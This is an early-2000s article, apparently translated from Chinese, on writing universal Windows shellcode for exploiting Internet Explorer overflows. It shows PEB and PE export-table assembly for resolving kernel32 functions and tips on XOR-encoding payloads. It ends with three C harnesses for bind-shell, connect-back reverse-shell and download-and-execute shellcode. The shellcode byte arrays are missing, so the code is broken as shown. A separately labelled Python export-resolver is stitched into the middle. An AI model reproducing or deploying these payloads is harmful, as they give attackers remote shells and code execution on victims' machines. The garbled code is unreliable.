[Principle] Shellcode writing technology


Shellcode writing technology

Create time: 2003-08-31

Article attribute: original

Article submission: JENO (xxgchappy_at_vip.sina.com)

Author: jeno

Email: jeno@vip.371.net

Time: 2003-8-31

Title: Shellcode writing technology

A few days ago, while debugging

http://www.microsoft.com/technet/security/bulletin/ms03-015.asp

I ran into something frustrating: I could gain code execution by overwriting EIP or the SEH handler, but none of the shellcode circulating online met my requirements, mainly for the following reasons:

1. Not universal: it usually runs only on Win2000 and rarely runs correctly on WinXP or Win2003.

2. No handling of process exit, so when IE is overflowed, IE crashes as well.

3. Some of the code is too long, even more than 1000 bytes.

4. It may not work universally at different locations.

For these four reasons I decided to write a universal shellcode. What actually makes shellcode non-universal is the way it obtains addresses. Most of the shellcode I have seen from others is not very good in this respect: it finds the address of kernel32 through the PEB, then appends the ASCII names of the functions it needs to the end of the shellcode and finds their addresses by searching memory.

Let me first explain why the address of kernel32 can be found through the PEB:

1. FS points to the TEB structure.

2. TEB offset 0x30 points to the PEB structure.

3. PEB offset 0x0C points to the PEB_LDR_DATA structure.

4. PEB_LDR_DATA offset 0x1C holds the list of loaded dynamic link libraries: the first entry points to NTDLL.DLL, and the entry after it is the kernel32.dll we need.

The corresponding assembly code:

mov eax, fs:[0x30]
mov eax, [eax+0x0c]
mov esi, [eax+0x1c]
lodsd
mov ebp, [eax+0x08]      ; EBP = base address of kernel32.dll

The assembly that ordinary shellcode uses to find a function address looks like this:

search_function:
    inc ebx
    cmp [ebx], dl
    jne no_zero
    inc ecx
no_zero:
    cmp [ebx], dword ptr 'PTEG'          ; "GetP"
    jne no_match
    cmp [ebx+4], dword ptr 'Acor'        ; "rocA"
    jne no_match
    je search_complete
no_match:
    jmp search_function

EBX is loaded from [ESI], and what ESI points to is usually a hard-coded base address, for example:

db 0FFh, 0FFh, 0E8h, 077h    ; specify the kernel base @ 77E60000h

This fixed address is the main reason ordinary shellcode is not universal.

To make the shellcode universal we have to parse the PE file format. By parsing it we can get function addresses from the PE export directory table (EDT):

1. PE header offset = [kernel32.dll base address + 0x3C];

2. Export Directory offset = [kernel32.dll base address + PE header offset + 120];

3. Export Directory Table = kernel32.dll base address + Export Directory offset;

4. Name Pointers Table = [Export Directory Table + 32];

5. Compare the function names in the Name Pointers Table (you can compare the name itself, or compare a hash of the name);

6. Ordinals Table = [Export Directory Table + 36];

7. The Ordinals Table leads to the function addresses, so the address of the function with the matching ordinal is found through the Ordinals Table.

The search in assembly:

mov ebp, [somewhere]       ; kernel32.dll base address
mov eax, [ebp+0x3c]        ; EAX = PE header offset
mov edx, [ebp+eax+120]
add edx, ebp               ; EDX = Export Directory Table
mov ecx, [edx+24]          ; ECX = Number of Name Pointers
mov ebx, [edx+32]
add ebx, ebp               ; EBX = Name Pointers Table
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp               ; ESI points to a Name Pointer (the function name)

You can write the rest of the search yourself; the sky's the limit!
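The seven steps above carried out in Python against a constructed PE32 image, as an added example that is not part of the original article. The offsets are the ones the article lists (0x3C, 120, 24, 32, 36) plus the Export Address Table at offset 28, which is where the ordinal from step 7 is finally used; the two-export image is constructed test data, not a real kernel32.dll, and the same lookup is what any PE parser does when listing a DLL's exports.

```python
import struct

# Offsets from the article's walk (PE32 / COFF spec)
E_LFANEW = 0x3C      # DOS header -> PE header offset
EXPORT_DIR = 120     # PE header + 120 -> RVA of the Export Directory Table
NUM_NAMES = 24       # EDT + 24 -> NumberOfNames
ADDR_FUNCS = 28      # EDT + 28 -> Export Address Table (RVA), indexed by ordinal
ADDR_NAMES = 32      # EDT + 32 -> Name Pointers Table (RVA)
ADDR_ORDS = 36       # EDT + 36 -> Ordinals Table (RVA)


def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]


def resolve_export(image, name):
    """Return the RVA of export `name` from a flat PE32 image (RVA == offset),
    following the article's steps 1-7; None if the name is not exported."""
    pe = u32(image, E_LFANEW)                     # step 1: PE header offset
    edt = u32(image, pe + EXPORT_DIR)             # steps 2-3: Export Directory Table
    names = u32(image, edt + ADDR_NAMES)          # step 4: Name Pointers Table
    ords = u32(image, edt + ADDR_ORDS)            # step 6: Ordinals Table
    funcs = u32(image, edt + ADDR_FUNCS)          # Export Address Table
    for i in range(u32(image, edt + NUM_NAMES)):  # step 5: compare each name
        name_rva = u32(image, names + 4 * i)
        if image[name_rva:image.index(b"\0", name_rva)] == name.encode():
            ordinal = struct.unpack_from("<H", image, ords + 2 * i)[0]
            return u32(image, funcs + 4 * ordinal)  # step 7: address via ordinal
    return None


def build_test_image():
    """Constructed two-export PE32 image (test data, not a real DLL).
    Ordinals are deliberately out of name order to exercise step 7."""
    img = bytearray(0x400)
    pe, edt = 0x80, 0x200
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, E_LFANEW, pe)
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<I", img, pe + EXPORT_DIR, edt)
    exports = {"ExitProcess": 0x1000, "GetProcAddress": 0x2000}
    funcs, names, ords, strs = 0x240, 0x250, 0x260, 0x270
    for i, (nm, rva) in enumerate(sorted(exports.items())):
        ordinal = len(exports) - 1 - i
        struct.pack_into("<I", img, funcs + 4 * ordinal, rva)
        struct.pack_into("<I", img, names + 4 * i, strs)
        struct.pack_into("<H", img, ords + 2 * i, ordinal)
        img[strs:strs + len(nm)] = nm.encode()
        strs += len(nm) + 1
    # NumberOfNames, AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    struct.pack_into("<IIII", img, edt + NUM_NAMES, len(exports), funcs, names, ords)
    return bytes(img)
```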

Experience:

1. When writing network shellcode, it is best to add a WaitForSingleObject.

2. Don't forget ExitProcess; it avoids many program errors.

3. After XOR-encoding with 0x99 the code must not contain a 0x0A byte, because during the IE overflow the string copy turns 0x0A into 0x0D 0x0A, which corrupts the code.

Well, that's it! I hope everyone finds it inspiring!

Here are my three universal shellcodes:

1. Bind port 19800

#include <winsock2.h>
#include <windows.h>
#include <string.h>
#pragma comment(lib, "WS2_32.LIB")

#define SCPORT 19800

// don't change the offset
#define PORT_OFFSET 251

unsigned char jeno_bindport19800_sc[] =


// bindport 19800
int main(int argc, char **argv)
{
    WSADATA wsa;
    unsigned short port;

    WSAStartup(MAKEWORD(2, 2), &wsa);
    // the port is stored XOR-encoded (key 0x99) inside the encoded shellcode
    port = htons(SCPORT) ^ (u_short)0x9999;
    memcpy(&jeno_bindport19800_sc[PORT_OFFSET], &port, 2);
    ((void (*)(void))&jeno_bindport19800_sc)();
    return 0;
}

2. Reverse shellcode, default connect-back to 127.0.0.1:1980

#include <winsock2.h>
#include <windows.h>
#include <string.h>
#pragma comment(lib, "WS2_32.LIB")

#define SCIP "127.0.0.1"
#define SCPORT 1980

// don't change the offsets
#define IP_OFFSET 201
#define PORT_OFFSET 208

unsigned char jeno_connectback_sc[] =


int main(void)
{
    WSADATA wsa;
    unsigned short port;
    unsigned long ip;

    WSAStartup(MAKEWORD(2, 2), &wsa);
    // IP and port are stored XOR-encoded (key 0x99) inside the encoded shellcode
    port = htons(SCPORT) ^ (u_short)0x9999;
    ip = inet_addr(SCIP) ^ 0x99999999;
    memcpy(&jeno_connectback_sc[PORT_OFFSET], &port, 2);
    memcpy(&jeno_connectback_sc[IP_OFFSET], &ip, 4);
    ((void (*)(void))&jeno_connectback_sc)();
    return 0;
}

3. Download && Execute shellcode

#include <windows.h>
#include <stdio.h>

unsigned char jeno_downloadfile_sc[] =


int main(void)
{
    ((void (*)(void))&jeno_downloadfile_sc)();
    return 0;
}

End.

Please credit the original URL when reposting: https://www.9cbs.com/read-40968.html
